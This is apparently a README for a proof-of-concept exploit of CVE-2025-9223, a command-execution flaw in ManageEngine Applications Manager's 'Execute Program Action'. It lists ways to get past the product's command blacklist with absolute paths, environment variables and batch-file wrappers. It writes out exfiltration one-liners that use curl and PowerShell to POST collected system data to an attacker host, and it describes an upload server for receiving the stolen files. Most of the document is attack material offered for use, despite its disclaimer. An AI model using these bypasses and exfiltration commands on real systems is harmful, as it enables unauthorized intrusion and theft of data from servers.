
POC CVE-2025-9223
Ce dépôt contient une Preuve de Concept (PoC) qui démontre une vulnérabilité d'exécution de commandes dans la fonction « Execute Program Action » de ManageEngine Applications Manager.
Applications Manager utilise une liste noire (BlackListCommands) pour bloquer les commandes dangereuses, mais la validation présente des failles critiques :
| Méthode | Exemple |
|---|---|
| Chemin absolu | C:\Windows\System32\netstat.exe |
| Variables d'environnement | %SystemRoot%\System32\netstat.exe |
| Script wrapper | echo netstat > a.bat && a.bat |
C:\Windows\System32\netstat.exe > out.txt && C:\Windows\System32\curl.exe -X POST -F "[email protected]" http://[KALI_IP]:8000/upload
Le script upload_server.py fournit un serveur HTTP simple pour recevoir les fichiers exfiltrés.
python3 upload_server.py
python3 upload_server.py --host 0.0.0.0 --port 8000 --dir ./uploads
--host : Adresse de liaison (par défaut : 0.0.0.0)--port : Port HTTP (par défaut : 8000)--dir : Répertoire de sortie (par défaut : répertoire courant)✅ Protection contre le path traversal
✅ Noms de fichiers uniques avec horodatage
✅ Enregistrement des requêtes avec IP et User-Agent
✅ Validation du type de contenu
Créez un fichier test_commands.txt avec des exemples de contournement :
# Bypass con ruta absoluta
C:\Windows\System32\whoami.exe
C:\Windows\System32\netstat.exe -an
# Bypass con variables de entorno
%SystemRoot%\System32\ipconfig.exe
%SystemRoot%\System32\systeminfo.exe
# Bypass con script wrapper
echo ipconfig > test.bat && test.bat
echo whoami > test.bat && call test.bat
# Ejemplos de exfiltración de datos
C:\Windows\System32\ipconfig.exe > network.txt && C:\Windows\System32\curl.exe -X POST -F "[email protected]" http://ATTACKER_IP:8000/upload
C:\Windows\System32\systeminfo.exe > system.txt && C:\Windows\System32\powershell.exe -c "Invoke-WebRequest -Uri http://ATTACKER_IP:8000/upload -Method POST -InFile system.txt"
IMPORTANT : Cet outil est fourni uniquement à des fins éducatives et de tests autorisés.
❌ NE PAS utiliser sur des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas d'autorisation explicite de test
❌ NE PAS utiliser pour toute activité illégale
✅ OUI utiliser uniquement dans des environnements contrôlés pour la recherche en sécurité
✅ OUI obtenir une autorisation adéquate avant d'effectuer des tests
L'auteur n'est pas responsable de toute utilisation abusive de cet outil. Les utilisateurs assument l'entière responsabilité et les risques.
Ce projet est uniquement destiné à des fins de recherche et d'éducation. Tous droits réservés.
Johan Aybar - À des fins éducatives
⚠️ RAPPEL : Cette PoC doit être utilisée uniquement dans des environnements de test autorisés. Toute utilisation non autorisée peut être illégale et est strictement interdite.
| Méthode | Endpoint | Description |
|---|
| GET | / | Liste les fichiers téléchargés récemment |
| POST | /upload | Télécharge des fichiers (multipart/form-data) |
| PUT | /upload/[filename] | Chargement direct de fichiers |